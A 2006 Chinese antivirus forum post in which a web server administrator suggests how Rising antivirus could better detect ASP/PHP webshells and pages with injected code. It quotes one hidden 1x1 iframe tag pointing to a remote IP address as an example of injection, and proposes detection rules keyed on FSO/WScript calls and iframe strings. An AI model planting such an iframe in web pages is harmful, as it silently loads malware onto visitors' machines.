瑞星卡卡安全论坛

首页 » 本站站务区 » 站务 » 【原创】对于瑞星在查杀ASP,PHP木马时的不足,以及一些建议(服务器上用瑞星)
xinux - 2006-11-25 6:29:00
由于WEB服务器的特殊性,所以在WEB服务器上使用的杀毒软件要求可能与普通用户的不太一样,瑞星在帮助WEB服务器防毒方面还有所不足,我来提几点建议:

1.加大对于ASP,PHP木马的查杀力度,对于服务器来说,ASP,PHP木马甚至要比普通的病毒更让管理员们担心.由于ASP,PHP木马的制作简单,以及种类繁多,并且可能会与正常的ASP中的部分功能重置(例如:FSO),可能是由于这个原因杀毒软件往往不能全杀之(我猜的).除了现有的杀毒技能以外.我建议可以制作一个规则定义程序,比如说:让用户可选当在一个ASP文件中同时(或单独)出现FSO,WScript等功能的调用时,定义为木马.瑞星公司也可以设置几个安全等级的默认规则让不太熟悉的客户调用.

2.对于网站程序被客挂马的网页(不是纯木马网页),瑞星可以扫描出以后,对其进行危险性评估.以提示用户检查代码.

3.对于网站被插入内置框架的网页.(例如:<iFrAmE SRc=http://61.152.199.189/k.htm width=1 height=1 frameborder=0>),这样代码的网页,瑞星可以扫描出并提示用户,建议扫描方式可以有两种:1.把61.152.199.189存入恶意代码数据库,以比对查询2.为了防止该服务器本身就是肉机(机主是无估的),那也可以提供文件分析器(例如:找到包含<IFrame字符串的文件)以提示用户.(用户可以用文件批量替换软件修复)

4.刚才2,3两点都是被动的修复,而并主动防御.希望瑞星公司可以做到主动防御那就棒了,例如:可以设置某个文件夹下的指定扩展名文件不可被修改.

5.由于服务器上的病毒文件产生形式比一般的家用机要多一些,所以需要瑞星公司都监控到所有的病毒产生方式.比如:FTP上传,通过WEB直接上传,修改一个文本文件中的内容为病毒代码等等.因为我的服务器以前就出现过一个木马在我的服务器上了,但是它并没有被杀掉,我用mouse选中这个文件了,这个木马就被杀了,说明瑞星是可以杀这个木马的,但是他在生成的时候却没能发现.(我的瑞星是每天升级的)

6.在网页浏览的时候杀掉木马.这样即使木马文件在生成的时候不被发现,它在操作的时候仍会暴露.这个我不是太懂,只是一个想法,不知道能不能行.希望瑞星可以实现哦

7.通知机制.由于网页木马的不好判断性,直接杀了或隔离了,一旦误杀可能会有比较严重的后果,如果瑞星发现有可疑的木马文件,可以直接发送EMAIL到管理员的邮件里通知,万一是误报,管理员可以轻松的屏蔽(这个文件在再次被修改之前就不会发再了)

8.减小内存点用.这点就不多说了...


今天刚刚发现瑞星开了新版,看来终于重视我们管网的需求了,感动!!!连夜写了一些平时在日常维护工作中遇到的问题,以及考虑过的一些解决方法,方法不一定好可能很烂,只能瑞星公司做个参考以便让瑞星公司更能明白我们网管要的是什么...希望瑞星可以服务器木马查杀这一块做得更强!!!!
1
查看完整版本: 【原创】对于瑞星在查杀ASP,PHP木马时的不足,以及一些建议(服务器上用瑞星)